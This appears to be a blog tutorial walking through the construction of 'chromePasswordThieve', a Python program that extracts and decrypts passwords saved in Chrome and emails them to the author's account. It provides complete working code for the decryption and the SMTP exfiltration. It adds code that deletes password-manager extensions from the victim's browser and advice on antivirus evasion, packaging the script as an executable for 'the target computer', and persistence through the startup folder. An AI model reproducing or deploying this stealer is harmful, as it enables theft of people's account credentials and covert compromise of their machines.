chromePasswordThieve is an easy to develop program that is so elementary, that it evades anti virus

We start by creating a file called chromePasswordThieve.py with the following imports and constants

import os
import os.path as op
import shutil
import smtplib
import win32cryptfrom email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formatdate
from shutil import copyfile
from sqlite3 import connect

FROM = "from@gmail.com" #source email
PASSWORD = "password"   #source email pasword  

TO = "to@gmail.com"     #destination emailSUBJECT = "data for chromePasswordThieve.py"

MESSAGE = """\

here is output.txt :) 

"""

Be sure to change FROM PASSWORD TO to your desired values

Now that we have our basic setup out of the way, we can get started

we begin by creating two functions getPass() and sendEmail()

def getPass():
    passdef sendEmail():
    pass 

We will base our get pass functions from @darkarp

Using sqlite3 and win32crypt.CryptUnprotectData to select user data from the database. if you are wondering why to is so easy, you can read this, the inner workings of this function be read here.

We modify lines 145-196 to create the body of our getPass()

def getPass():
    # https://github.com/darkarp/chrome-password-hacking/blob/master/create_server.py    destination = "output.txt"

    path = env + "\\Google\\Chrome\\User Data\\Default\\Login Data"
    path2 = env + "\\Google\\Chrome\\User Data\\Default\\Login2"
    path = path.strip()
    path2 = path2.strip()

    try:
        copyfile(path, path2)
    except:
        pass
    conn = connect(path2)
    cursor = conn.cursor()
    cursor.execute(
        'SELECT action_url, username_value, password_value FROM logins')
    if os.path.exists(destination):
        os.remove(destination)
    sites = []
    for raw in cursor.fetchall():
        # print(raw)
        ## raw[0] = url
        ## raw[1] = login
        ## raw[2] = binary
        try:
            if raw[0] not in sites:
                # print(format(win32crypt.CryptUnprotectData(raw[2])[1]))
                if os.path.exists(destination):
                    with open(destination, "a") as password:
                        password.write('\n' + "Website: " + raw[0] + '\n' + "User/email: " + raw[1] +
                                       '\n' + "Password: " + format(win32crypt.CryptUnprotectData(raw[2])[1]) + '\n')
                else:
                    with open(destination, "a") as password:
                        password.write('\n' + "Website: " + raw[0] + '\n' + "User/email: " + raw[1] +
                                       '\n' + "Password: " + format(win32crypt.CryptUnprotectData(raw[2])[1]) + '\n')
                sites.append(raw[0])
        except:
            continue
    conn.close()
    return 0

Next from stackoverflow.com we figure out how to send an email with attachments

The code I ended up with is:

def sendEmail():
    # https://stackoverflow.com/questions/3362600/how-to-send-email-attachments
    msg = MIMEMultipart()
    msg['From'] = FROM
    msg['To'] = TO
    msg['Date'] = formatdate(localtime=True)
    msg['Subject'] = SUBJECT
    msg.attach(MIMEText(MESSAGE))

    part = MIMEBase('application', "octet-stream")
    with open('output.txt', 'rb') as file:
        part.set_payload(file.read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition',
                    'attachment; filename="{}"'.format(op.basename('output.txt')))  # name(s) of attachment(s)
    msg.attach(part)

    smtp = smtplib.SMTP('smtp.gmail.com', 587)
    smtp.starttls()
    smtp.login(FROM, PASSWORD)
    smtp.sendmail(FROM, TO, msg.as_string())
    smtp.quit()

    print('successfully sent the mail')

Finally we call our two functions

getPass()

sendEmail()

The code works as expected

Website: https://www.facebook.com/login/device-based/regular/login/
User/email: email@live.ca
Password: b’password’

Website: https://www.investopedia.com/accounts/login.aspx
User/email: email@gmail.com
Password: b’password’

Website: https://portal.aws.amazon.com/billing/signup
User/email: alik604
Password: b’password’

Website: https://portal.aws.amazon.com/billing/signup
User/email: alik604
Password: b'password'

Now let’s attempt to do above and beyond.

Not all people will click the ‘save password’ in chrome, perhaps they have a password manager … lets deal with that

In order for this to be of benefit, our code will need to run a second time in the future. Including this code is of marginal cost to use, so we might as well

env = os.getenv("LOCALAPPDATA")
path_lastpass = env + "\\Google\\Chrome\\User Data\\Default\\Extensions\\hdokiejnpimakedhajhdlcegeplioahd"
path_keeper = env + "\\Google\\Chrome\\User Data\\Default\\Extensions\\bfogiafebfohielmmehodmfbbebbbpei"
path_dasklane = env + "\\Google\\Chrome\\User Data\\Default\\Extensions\\fdjamakpfbbddfjaooikfcpapjohcfmg"
path_roboform = env + "\\Google\\Chrome\\User Data\\Default\\Extensions\\pnlccmojcmeohlpggmfnbbiapkmbliob"

try:
    pass
    shutil.rmtree(path_lastpass)
    shutil.rmtree(path_keeper)
    shutil.rmtree(path_dasklane)
    shutil.rmtree(path_roboform)
except:
    pass

we set our path variable to their corresponding chrome extension folders. we get the extension id with the following

To run this script we would either need to have python installed on the target computer, or convert to an executable

@lpoblet Has a detailed tutorial on creating an executable

While on the other hand a more concise tutorial can be found on Stackoverflow

Checking if chromePasswordThieve.py evades antivirus

“VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user’s own antivirus may have missed, or to verify against any false positives.”- Wikipedia

The following is an example on how more openly malicious programs evade antivirus

On a final note, let’s discuss persistence mechanisms

attack.mitre.org has a proper list of Persistence. Many are advanced and difficult to do due to both lack of educational resources, and complexity. examples of professional/government grade persistence would be hooking, and Process Injection, more details on the latter may be found here.

To make chromePasswordThieve.py persistent we can use techniques such as Shortcut Modification, or placing a compatible program in the startup folder.

To find the windows startup folder we refer to the following

We can easily pair the above with shutil.copyfile to copy our file into the startup folder. It is advisable to delete the original instance.

More information on persistence mechanisms can be found here

I am releasing the core code at on my Github

you can read to core for my other projects at: github.com/alik604/ReadMe a few on my interesting python or security projects are myPyBackDoor and data science

About me:

3rd-year Cognitive science marjor, VP of Cognitive Science Student Society. Interested in Machine learning, Computational Data science, and Finance. Research Interests are Applications of Quantitative Analytics in Finance and Human behavior.